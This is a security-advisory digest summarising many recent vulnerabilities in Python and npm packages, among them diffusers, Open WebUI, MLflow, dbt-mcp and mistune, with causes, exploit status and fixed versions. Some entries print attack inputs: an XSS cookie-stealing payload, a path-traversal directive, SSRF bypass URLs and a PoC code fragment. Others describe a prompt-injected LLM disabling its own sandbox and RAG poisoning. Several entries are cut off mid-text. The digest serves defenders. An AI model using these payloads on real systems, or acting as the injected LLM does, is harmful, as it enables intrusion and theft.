Python
Monthly
Remote code execution in Hugging Face diffusers (Python package, versions < 0.38.0) is achievable via a TOCTOU race between two sequential Hub downloads inside DiffusionPipeline.from_pretrained, letting a malicious repo owner bypass the trust_remote_code guard and silently execute arbitrary Python during model loading. Exploitation requires user interaction (loading a malicious repo without pinning a revision) and high attack complexity due to a sub-second race window, but no public exploit beyond the reporter's PoC is identified at time of analysis. Affected users running diffusers <0.38.0 should upgrade to 0.38.0 where the issue is fixed.
Path traversal in pymdownx.snippets versions 10.0.1 through 10.21.2 allows unauthenticated remote attackers to read arbitrary files from sibling directories outside the configured base_path, bypassing the restrict_base_path protection intended by CVE-2023-32309. The bypass exploits a string-prefix comparison introduced in PR #2039 that lacks directory-boundary enforcement, enabling a crafted snippet directive like '--8<-- "../docs_secret/leak.txt"' to escape the configured base directory when sibling paths share the same string prefix. Publicly available exploit code (proof-of-concept) exists in the GitHub Security Advisory; the vulnerability is not confirmed actively exploited in the CISA KEV catalog at time of analysis.
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent attackers to execute arbitrary OS commands by chaining two unprotected API endpoints. The Next.js authentication middleware in src/proxy.js uses a narrow route allowlist that excludes /api/cli-tools/* and /api/mcp/*, letting an attacker register an arbitrary command via POST /api/cli-tools/cowork-settings and then trigger spawn() via GET /api/mcp/[plugin]/sse. Publicly available exploit code exists (PoC published with the GHSA advisory), with CVSS 10.0 reflecting maximum severity across confidentiality, integrity, and availability.
Sensitive HTTP header values entered into the Strawberry GraphQL bundled GraphiQL IDE are serialized into the browser URL query string via JavaScript's history.replaceState, exposing credentials such as Authorization bearer tokens to browser history, copy-paste clipboard actions, and server/proxy/CDN access logs. Affected are strawberry-graphql versions 0.288.4 through 0.315.3 - any Python application exposing the default GraphiQL interface without explicit opt-out. No public exploit has been identified at time of analysis, and the CVSS score of 3.1 (Low) reflects that exploitation requires user interaction; however, in developer and staging environments where the IDE is commonly left enabled, token leakage via shared URLs or log aggregation is a realistic risk.
Arbitrary file write via path traversal in Mailpit's `dump --http` subcommand (versions < 1.30.0) allows any HTTP server impersonating a Mailpit instance to write attacker-controlled bytes to arbitrary paths outside the intended output directory. The attacker controls both the file path (via the message ID field in the JSON response) and the file contents (via the raw message body endpoint), enabling writes anywhere the dumping user has write permission - including cron jobs, shell startup files, and CI artifact directories. Publicly available exploit code exists (Python PoC published in GHSA-qx5x-85p8-vg4j); no confirmed active exploitation at time of analysis.
Server-side request forgery in the zrok Python SDK's ProxyShare component (versions 0.4.47 through 1.1.11) allows remote unauthenticated users to redirect proxied requests to arbitrary hosts by submitting absolute URLs in the request path. Because the Flask handler concatenates user input with the configured target via urllib.parse.urljoin, an attacker (Bob) can replace the share owner's (Alice's) intended target with any host including internal cloud metadata endpoints, and the response is returned to the attacker. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-jh67-hwqw-m5r7 documents the technique in detail.
Information disclosure in Algernon web server versions 1.17.6 and earlier allows unauthenticated remote attackers to retrieve full server-side source code, including embedded secrets, by triggering runtime errors in Lua, Pongo2, Amber, or HTML template handlers. When Algernon is started with a single file path (e.g. `algernon page.po2`), single-file mode unconditionally forces debug mode on, activating the PrettyError renderer which returns absolute file paths and complete file contents in HTTP 200 responses. Crucially, the `--prod` hardening flag does not block this behavior for non-`.lua` extensions, and publicly available exploit code exists in the GHSA advisory.
Server-side request forgery in AutoGPT Platform versions 0.1.0 through 0.6.51 allows any authenticated user on a shared deployment to conduct non-blind internal network port scanning and service fingerprinting by exploiting the SendEmailBlock's unvalidated SMTP connection handling. The block accepts user-supplied smtp_server and smtp_port inputs and passes them directly to Python's smtplib.SMTP(), completely bypassing the platform's dedicated SSRF defenses - the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist in backend/util/request.py that every other block observes. Because smtplib surfaces TCP banners in exception messages that are persisted as visible block output, this is a non-blind SSRF, giving attackers readable reconnaissance data about internal hosts and services. No public exploit identified at time of analysis; vendor-released patch is confirmed in version 0.6.52.
Remote code execution in APScheduler (all versions through 3.10.x and 4.0.0a5) is achievable when applications deserialize attacker-controlled data via the bundled JSONSerializer or CBORSerializer. The unmarshal_object routine dynamically imports modules and invokes __setstate__ on arbitrary classes, letting an attacker pivot an untrusted payload into code execution; publicly available exploit code exists, though EPSS remains low at 0.06% (19th percentile).
Local privilege escalation to arbitrary code execution in MLflow versions prior to 3.11.0 stems from insecure temporary directory permissions (0o777 and 0o770) created by NFS and model-download helpers. Any local user sharing the filesystem - particularly on Databricks where NFS is enabled by default - can overwrite cloudpickle-serialized model artifacts and gain code execution when another user's process deserializes them via cloudpickle.load(). No public exploit is identified at time of analysis, and the issue is a continuation of CVE-2025-10279 which was only partially fixed.
Local file disclosure in NiceGUI versions <= 3.11.1 allows remote unauthenticated attackers to read arbitrary files accessible to the server process when applications pass user-controlled content to ui.restructured_text(). The flaw stems from Docutils being invoked without disabling file-insertion directives (include, csv-table :file:, raw :file:), enabling exfiltration of secrets, credentials, and source code. No public exploit identified at time of analysis, but the vendor advisory provides full directive-level proof patterns.
Remote denial-of-service in OpenTelemetry eBPF Instrumentation (OBI) versions 0.7.0 through 0.8.x allows unauthenticated attackers to crash the privileged instrumentation process by sending a crafted memcached storage command with an oversized `<bytes>` field. The integer overflow in the memcached text protocol parser produces a negative payload length that triggers a Go runtime panic in LargeBufferReader.Peek, halting telemetry collection until OBI is restarted. Publicly available exploit code exists in the GHSA-43g7-cwr8-q3jh advisory, but there is no public exploit identified beyond the PoC and the vulnerability is not listed in CISA KEV.
Remote code execution in the amazon-redshift-python-driver (versions prior to 2.1.14) allows a malicious or compromised Redshift server, or a man-in-the-middle attacker positioned on the network path, to execute arbitrary Python code on any client that connects. The root cause is unsafe use of Python's eval() against untrusted server-supplied data inside the vector_in() function. No public exploit identified at time of analysis, but the CVSS 4.0 base score of 9.3 and PR:N/UI:N vector make this a high-priority client-side supply-chain-style risk.
Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.
{tenant}/databases/{db}/collections endpoint. The flaw carries a maximum CVSS 4.0 score of 10.0 and was disclosed publicly by HiddenLayer; no public exploit identified at time of analysis, though detailed research has been published.
SGLangs multimodal generation runtime is vulnerable to unauthenticated remote code execution when the --enable-custom-logit-processor option is enabled, as Python objects loaded via dill.loads() will be deserialized without validation.
python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Budibase's REST datasource integration before version 3.38.1 bypasses IP blacklist security controls through HTTP redirect following. Authenticated Builder-level users can exploit this to access cloud metadata services and internal databases by redirecting requests through attacker-controlled servers, potentially stealing AWS/GCP/Azure credentials. This vulnerability class was previously fixed in automation steps but the REST integration was overlooked, creating an inconsistent security posture.
{filename:path} endpoint fails to validate paths containing %2F-encoded directory separators, bypassing Starlette's URL normalization. Fixed in version 1.2.0 with no public exploit identified at time of analysis.
Archive extraction boundary failure in Microsoft APM's legacy-bundle probe allows local attackers to overwrite arbitrary files on Windows systems running Python 3.10 or 3.11. When users run 'apm install' on a malicious .tar.gz file, untrusted tar members bypass path validation, enabling absolute path writes (e.g., D:/...) that compromise system integrity. Fixed in version 0.13.0. No active exploitation confirmed at time of analysis, but the local attack vector with user interaction required (CVSS AV:L/UI:R) limits real-world risk to social engineering scenarios targeting AI agent developers on Windows platforms.
Authentication bypass in MLflow 3.9.0 and earlier allows unauthenticated remote attackers to access protected Job API and OpenTelemetry trace ingestion endpoints when the server runs with basic-auth enabled via uvicorn/ASGI. Attackers can submit jobs, read results, cancel operations, and inject trace data without credentials. The FastAPI permission middleware incorrectly enforced authentication only on /gateway/ routes, leaving /ajax-api/3.0/jobs/* and /v1/traces unprotected due to architectural mismatch between Flask and FastAPI authentication mechanisms. Fixed in version 3.10.0 with GitHub commit bb62e77 adding proper validators for all FastAPI routes.
python-utcp CLI subprocess environment passes all process-level secrets to every tool call. When chained with CVE-2026-45369 command injection, remote authenticated attackers with low-privilege LLM tool access can exfiltrate AWS credentials, API keys, database URLs, and other environment variables in a single HTTP request. Patch available in version 1.1.2 (NVD references 1.1.3 as fixed version). GitHub security advisory confirms proof-of-concept demonstrating credential theft via env dump to attacker-controlled endpoint.
Command injection in python-utcp allows remote attackers to execute arbitrary shell commands on Unix and Windows systems when user-controlled tool arguments are processed by the CLI communication protocol module. The _substitute_utcp_args method in cli_communication_protocol.py directly embeds unsanitized user input into bash or PowerShell commands without escaping, enabling full remote code execution. Vendor-released patch available in version 1.1.2 with shell-quoting mitigation (shlex.quote on Unix, single-quoted literals on Windows). CVSS 8.3 indicates high complexity and required user interaction, but scope change enables container/sandbox escape scenarios. No public exploit code or CISA KEV listing identified at time of analysis, though detailed proof-of-concept exists in the GitHub security advisory demonstrating data exfiltration via curl.
Server-Side Request Forgery in @utcp/http <= 1.1.1 allows remote attackers to redirect tool invocations to internal services via malicious OpenAPI specs. An attacker hosting a malicious OpenAPI specification on a legitimate HTTPS endpoint can declare internal server URLs (e.g., http://127.0.0.1:9090 or http://169.254.169.254) in the servers array; the OpenApiConverter blindly trusts these URLs without revalidation during tool invocation, enabling access to cloud metadata endpoints, internal databases, and loopback services. Additionally, a prefix-bypass in hostname validation (startsWith check) allows URLs like http://localhost.evil.com to bypass discovery-time restrictions. Patch version 1.1.2 is available.
Multiple concurrent LDAP or OAuth first-login requests on a freshly deployed Open WebUI instance can all receive administrator privileges through a TOCTOU race condition in role assignment logic. The vulnerability affects deployments using LDAP or OAuth authentication on instances with no existing users. While the regular signup handler was explicitly patched for this race condition in earlier code ('Insert with default role first to avoid TOCTOU race'), the LDAP and OAuth authentication paths were never updated with the same fix. Vendor-released patch available in version 0.9.0 (April 2026). No active exploitation confirmed (not in CISA KEV), though publicly available exploit code exists per GitHub advisory GHSA-h3ww-q6xx-w7x3. CVSS 8.1 (High) reflects network attack vector but requires high attack complexity (precise timing of concurrent requests during narrow first-deployment window).
Open WebUI versions through 0.8.11 allow authenticated users to execute arbitrary Python code in the Jupyter container by bypassing the ENABLE_CODE_EXECUTION=false configuration flag. The /api/v1/utils/code/execute endpoint fails to enforce the admin-configured feature gate (CWE-863: Incorrect Authorization), enabling any verified user to run code even when administrators believe execution is disabled. The vulnerability is confirmed by vendor POC (verified 2026-03-25) demonstrating successful code execution, file access, and SSRF to internal Docker services despite explicit admin configuration disabling the feature. Vendor-released patch available in v0.8.12 (commit 6d736d3c5) enforces the configuration check before dispatching code to Jupyter.
{id}/files to any user with read access. This affects all default Docker deployments where chat sharing is enabled. Vendor-released patch available in v0.9.0 (commit 2e52ad8ff). No active exploitation confirmed (not in CISA KEV). CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H scores 8.0, though real-world impact extends beyond confidentiality to permanent data destruction with no recovery mechanism.
URL parser mismatch in Open WebUI allows authenticated users to bypass SSRF protections and access internal network resources. The validate_url function uses Python's urlparse library to extract hostnames for validation, while the requests library handles actual HTTP requests. These libraries disagree on parsing URLs containing backslash characters (e.g., http://127.0.0.1:6666\@1.1.1.1), allowing attackers to craft URLs that pass validation as external addresses but resolve to internal hosts. Exploitation requires low-privilege authentication but no user interaction, enabling access to cloud metadata endpoints and internal services. Fixed in version 0.9.5 per GitHub advisory GHSA-8w7q-q5jp-jvgx.
{task_id}. Attackers can disrupt system-wide chat generation and background processing by continuously canceling active tasks across the multi-user instance. Publicly available exploit code exists. Vendor-released patch in v0.9.0 restricts global task endpoints to admin-only and introduces a scoped /api/tasks/chat/{chat_id}/stop endpoint for legitimate user-owned task termination. CVSS 7.1 (AV:N/AC:L/PR:L/UI:N) reflects network-accessible, low-complexity exploitation requiring only authenticated low-privilege access, with high availability impact and low confidentiality impact from task enumeration.
Insecure Direct Object Reference (IDOR) in Open WebUI's retrieval API allows authenticated users to bypass knowledge base access controls and directly access, modify, or delete other users' private knowledge bases by supplying the target UUID as a collection name. The authorization gap affects seven endpoints: two read endpoints (/query/doc, /query/collection) permit exfiltration of private knowledge base content, while five write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube) enable content injection, poisoning, or complete data destruction via overwrite. Affects Open WebUI <= 0.9.4; fixed in v0.9.5 via PR #22109. EPSS data not available; no confirmed active exploitation (CVSS 7.5 reflects AC:H due to UUID prerequisite, but UUIDs leak through multiple channels per researcher analysis).
Open WebUI's GET /api/v1/retrieval/ endpoint discloses RAG pipeline configuration including embedding models, chunking parameters, and RAG templates to unauthenticated attackers with a single HTTP request. The vulnerability affects v0.9.2 and earlier, where this endpoint lacks authentication guards present on all adjacent endpoints, enabling reconnaissance for RAG poisoning attacks and infrastructure fingerprinting without requiring credentials, authentication tokens, or user interaction.
Mass assignment vulnerability in Open WebUI v0.9.2 allows authenticated attackers to spoof user identities and manipulate model evaluation data by injecting a `user_id` field into feedback requests. The `POST /api/v1/evaluations/feedback` endpoint fails to properly validate and segregate server-set values from user-supplied input, enabling attackers to create feedback records attributed to arbitrary users and corrupt Elo-based model leaderboard rankings. Patch available in v0.9.5.
{id}/update) fails to enforce the workspace.tools authorization check that gates code execution, allowing users explicitly denied code execution capabilities to bypass this security boundary. This breaks Open WebUI's documented trust model where workspace.tools permission is intentionally disabled by default and 'equivalent to giving them shell access to the server.' Exploitation achieves root code execution (PID 1) in default Docker deployments, enabling extraction of secrets (WEBUI_SECRET_KEY, API keys), database access, and filesystem read/write. Confirmed by GitHub security advisory GHSA-p4fx-23fq-jfg6. No public exploit or KEV listing at time of analysis, but detailed proof-of-concept with Burp Collaborator confirmation exists in the advisory.
Modify messages from any channel member in Open WebUI v0.8.12 through v0.9.4 via Insecure Direct Object Reference (IDOR) in the message update API endpoint. Any authenticated user with group or direct message channel membership can tamper with messages sent by other members, including administrators, by bypassing message ownership verification. Publicly available exploit code exists demonstrating the vulnerability; patch available in v0.9.5.
Open WebUI versions 0.8.10 and earlier allow authenticated users to bypass model access control by appending ?bypass_filter=true to POST requests to /openai/chat/completions or /ollama/api/chat endpoints. The vulnerability exposes an internal-only FastAPI function parameter to external HTTP clients via query string binding, permitting any authenticated user to invoke admin-restricted models regardless of their assigned access grants. Vendor-released patch: v0.8.11 (March 2026). No public exploit code identified beyond the PoC in the advisory, but exploitation is trivial for any authenticated user.
Server-Side Request Forgery (SSRF) in Open WebUI versions ≤0.8.12 allows authenticated users with OAuth access to force the server to make HTTP requests to arbitrary internal resources and exfiltrate complete response data. Exploitation requires OAuth-enabled deployments with ENABLE_OAUTH_SIGNUP=true or OAUTH_UPDATE_PICTURE_ON_LOGIN=true. An attacker controls the OAuth provider's 'picture' claim URL, triggering server-side HTTP requests to cloud metadata services (AWS IMDS), localhost services (Redis, Elasticsearch), or internal network endpoints. The full response is base64-encoded and stored in the user's profile_image_url field, enabling complete data exfiltration. Fixed in version 0.9.0 per GitHub advisory GHSA-24c9-2m8q-qhmh. EPSS data not available; no CISA KEV listing indicates limited widespread exploitation, though publicly available proof-of-concept exists in the GitHub advisory.
Server-Side Request Forgery in Open WebUI's `validate_url()` function allows authenticated attackers to reach internal IPv4/IPv6 addresses, bypassing security controls via three distinct flaws: the validators library silently fails on IPv6 private-address checks (raising ValidationError which evaluates as falsy), IPv4-mapped IPv6 addresses (::ffff:10.0.0.1) evade IPv4 filtering entirely, and multiple IANA-reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, 198.18.0.0/15, 203.0.113.0/24) remain unblocked. The vulnerability persists in the RAG web search, image editing, and other endpoints despite an earlier incomplete remediation attempt (CVE-2025-65958), enabling exfiltration of AWS IMDSv1 credentials and access to localhost-bound services. Publicly available exploit code exists (demonstrated POC in advisory), affecting Open WebUI ≤0.8.12 with fix released in version 0.9.0.
{id}/pin endpoint, which incorrectly checks for read permission instead of write permission. This privilege escalation enables read-only users to perform a write operation (toggling is_pinned state) that should be restricted to users with explicit write access. The vulnerability is limited to the pin operation and does not permit modification of note content, title, or access grants. Publicly available proof-of-concept demonstrates the bypass across all shared notes with read access.
Stored cross-site scripting (XSS) in Open WebUI ≤0.9.2 allows authenticated users with default speech-to-text permissions to upload polyglot WAV+HTML files through the audio transcription endpoint, achieving code execution in victim browsers and enabling full account takeover including administrator sessions. The vulnerability chains insecure file extension handling with unrestricted Content-Type serving and non-HttpOnly JWT storage to weaponize a single-click attack. Publicly available exploit code exists with video demonstration; no active exploitation confirmed by CISA KEV at time of analysis. CVSS 8.7 (High) reflects changed scope (S:C) and user interaction requirement, but real-world risk is elevated because the vulnerable permission defaults to enabled and the attack yields immediate admin-level access in typical deployments.
Authenticated admin users in pyLoad-ng can bypass the CVE-2026-33509 fix by setting the storage_folder to the Flask session directory (/tmp/pyLoad/flask), then downloading and reusing session files of other users via the /files/get/ endpoint to achieve account takeover. The original patch failed to block access to the session cache directory, leaving it accessible through the directory traversal protection bypass. Publicly available proof-of-concept code confirms the bypass is functional.
{user_id}/profile/image endpoint, executes scripts with access to localStorage and enables full account takeover of any user viewing the malicious profile image, including administrators. Two independent reporters demonstrated distinct vectors: one via HTML data URIs in new tabs (limited scope), and one via SVG data URIs served by the application origin (account takeover). No public exploit code or active exploitation has been confirmed, but the vulnerability requires only authenticated access and user interaction (viewing a profile image).
Remote authenticated actors with S3 write access can achieve code execution in Amazon SageMaker Triton inference containers by replacing model artifacts with malicious pickle payloads that are deserialized without integrity verification. Affected versions are SDK v2 before v2.257.2 and v3 before v3.8.0. The vulnerability requires high-privilege S3 access to the model artifact path but carries severe impact including arbitrary code execution within inference containers. No public exploit code or active exploitation has been identified at time of analysis.
Cleartext HMAC signing key exposure in Amazon SageMaker Python SDK versions <2.257.2 and <3.8.0 enables authenticated attackers with SageMaker describe API and S3 write permissions to forge model artifact integrity signatures and achieve remote code execution in inference containers. AWS released patches in v2.257.2 and v3.8.0 with security fixes addressing Triton HMAC key exposure and missing integrity checks. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, suggesting limited exploitation activity despite high CVSS score.
Authenticated server-side request forgery in ApostropheCMS allows low-privilege users to force the server to fetch arbitrary internal URLs through the rich-text widget import flow. Attackers with content editing permissions can exfiltrate internal data by crafting malicious image tags that trigger server-side fetch operations, with image-compatible responses being persisted and re-hosted by the application. Publicly available exploit code exists (full Python PoC published in GitHub advisory GHSA-pr28-mf3q-qpg6), enabling immediate weaponization. All versions through 4.29.0 are affected with no vendor-released patch identified at time of analysis, creating sustained exposure for organizations running this popular Node.js CMS.
dbt-mcp DefaultUsageTracker transmits unredacted MCP tool arguments-including raw SQL queries and credential-bearing --vars JSON-to dbt Labs telemetry by default without user opt-in. Affects dbt-mcp ≤1.17.0; tracking is enabled unless users explicitly set DBT_SEND_ANONYMOUS_USAGE_STATS=false or DO_NOT_TRACK=1 before installation, creating silent exfiltration of potentially sensitive database schema, credentials, and personally identifiable information. The vulnerability has been verified by proof-of-concept source code analysis and execution against dbt-mcp v1.15.1.
dbt MCP Server logs complete tool arguments including SQL queries and database credentials in plaintext to disk when file logging is enabled. Versions up to 1.17.0 write unredacted arguments from every tool invocation to dbt-mcp.log, with sensitive data such as raw SQL queries, credential-bearing vars payloads, and node selectors persisting indefinitely without automatic rotation. A local attacker with read access to the log file can extract credentials and SQL logic. Publicly available proof-of-concept demonstrates credential and PII extraction from log files.
Argument injection in dbt-mcp v1.15.1 through v1.17.0 allows MCP clients to inject arbitrary dbt command-line flags such as --profiles-dir, --project-dir, and --target via unsanitized node_selection and resource_type parameters, enabling attackers to redirect dbt's configuration and database operations to attacker-controlled locations. The vulnerability is exploitable via two independent vectors in the _run_dbt_command() function and has been verified by proof-of-concept code demonstrating arbitrary dbt profile injection. Vendor-released patch available in v1.17.1.
CSS injection in mistune's Image directive plugin allows unauthenticated remote attackers to inject arbitrary CSS properties via the :width: or :height: options in fenced image directives, enabling full-page phishing overlays and UI redressing attacks. The vulnerability stems from a prefix-only regex validation (_num_re.match() with no end-of-string anchor) that accepts values like '100vw;position:fixed;background-color:#e11d48;...' and renders them unescaped into style= attributes. Confirmed fixed in v3.2.1; publicly available proof-of-concept demonstrates full-viewport colored overlay generation from a single malicious :width: directive.
Cross-site scripting (XSS) vulnerability in mistune's render_toc_ul() function allows attackers to inject arbitrary HTML and JavaScript into table-of-contents output by crafting malicious heading IDs. When heading identifiers are derived from user-supplied text (standard practice for readable slug anchors), an attacker can break out of the href attribute context with a payload like `x"><script>alert(document.cookie)</script><a href="`, causing the script block to execute in the rendered TOC. The vulnerability requires user interaction (UI:R) to view the poisoned TOC but affects all users of the generated page. Vendor-released patch available in mistune 3.2.1.
Remote code execution in HuggingFace Diffusers library (versions < 0.38.0) allows attackers to execute arbitrary Python code when victims load malicious pipelines from Hugging Face Hub repositories. The vulnerability bypasses the trust_remote_code=True safeguard through a type coercion flaw where None values are interpolated as 'None.py' filenames. Attackers can achieve silent code execution by publishing repositories containing a malicious None.py file alongside legitimate-looking configuration, requiring only that victims call DiffusionPipeline.from_pretrained() on the attacker's repository. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch: version 0.38.0.
pyzipper before version 0.4.0 fails to use AE-2 encryption format due to an operator precedence bug, causing CRC32 checksums to be stored unencrypted in ZIP headers. Attackers with access to encrypted archives can extract plaintext CRC32 values and conduct brute-force attacks on small or low-entropy files to recover their content without decrypting the AES encryption itself. Large or high-entropy files remain practically safe under current computational constraints, but the vulnerability represents a cryptographic bypass for files under approximately 20 bytes.
Privilege escalation in wger fitness manager allows gym trainers to impersonate gym managers via session-chain attack. An authenticated trainer exploits flawed session-flag logic in the trainer-login endpoint to bypass permission checks - first switching into a low-privilege user, then leveraging the inherited 'trainer.identity' session flag to hop into manager accounts. Publicly available proof-of-concept demonstrates complete takeover of gym administration with CVSS 8.1 (network-accessible, low complexity). No vendor patch confirmed at time of analysis; vulnerability actively disclosed by wger-project GitHub advisory GHSA-9qpr-vc49-hqg2. EPSS score not available, not in CISA KEV. Root cause is CWE-269 (improper privilege management) in core/views/user.py lines 169-178.
{id}/logs/ and /api/v2/routine/{id}/stats/ endpoints. Detailed proof-of-concept with Python exploit confirms trivial exploitation against wger <= 2.5.0a2. CVSS 7.5 rates this High severity, but NOTE: vector PR:N appears inconsistent with authenticated-only access described - attackers need valid credentials, suggesting actual vector should be PR:L. EPSS data not available. No CVE KEV listing or public exploit repositories identified beyond GitHub advisory disclosure. Patch status unconfirmed - GitHub advisory references fix commit but no released version number provided in available data.
Local code execution in the claude-code-cache-fix npm package (v3.5.0 and v3.5.1) lets attacker-controlled filesystem path names run arbitrary Python inside a victim's Claude Code process. The bundled tools/quota-statusline.sh interpolates Claude Code's statusline hook stdin — which reflects user-controlled paths such as cwd, workspace.current_dir, workspace.project_dir, and transcript_path — directly into a Python triple-quoted literal, so a directory name containing the byte sequence ''' closes the literal early and executes following bytes as Python at the user's privilege on every statusline redraw. A working injection payload is publicly available exploit code (published in the GHSA advisory and the T6/T7 regression tests); the issue is not listed in CISA KEV and no EPSS score was provided.
Unsafe deserialization in LangSmith SDK's prompt pull methods allows remote attackers to execute server-side request forgery (SSRF) and redirect LLM traffic to attacker-controlled infrastructure when applications pull public prompts from LangSmith Hub. The SDK deserializes untrusted prompt manifests containing serialized LangChain objects with attacker-controlled constructor arguments, including malicious base_url configurations, custom headers, and secret references. Exploitation requires user interaction (developers must call pull_prompt with a malicious owner/name identifier), but no authentication is required to publish malicious prompts to the public Hub. Vendor-released patches in Python >= 0.8.0 and JS/TS >= 0.6.0 now block public prompt pulling by default, requiring explicit opt-in via dangerously_pull_public_prompt flag. EPSS data not available; no CISA KEV listing or public exploit identified at time of analysis.
Unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoints allows remote attackers to redirect users to attacker-controlled URLs by submitting authorization requests that omit the openid scope. The vulnerability occurs because scope validation happens before redirect_uri validation, allowing the error handler to return an HTTP 302 with an unvalidated attacker-supplied redirect_uri. A proof-of-concept GET request demonstrates the flaw trivially; no authentication, valid client_id, or user interaction beyond clicking the link is required, though the CVSS score of 6.1 reflects the requirement for user interaction (UI:R) to click the phishing link. Actively exploited in the wild (KEV status), this is a Medium-severity open redirect enabling credential harvesting attacks.
{"x": "A" * 200000} def run(): try: ujson.dump(obj, BadFile()) except RuntimeError: pass run() tracemalloc.start() gc.collect() base = tracemalloc.get_traced_memory()[0] for i in range(5): run() gc.collect() cur = tracemalloc.get_traced_memory()[0] print(i, cur - base) ``` Any application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response. The missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1). Replacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.
Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.
Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).
Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.
Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.
Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.
Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.
Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.
Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.
Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.
Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.
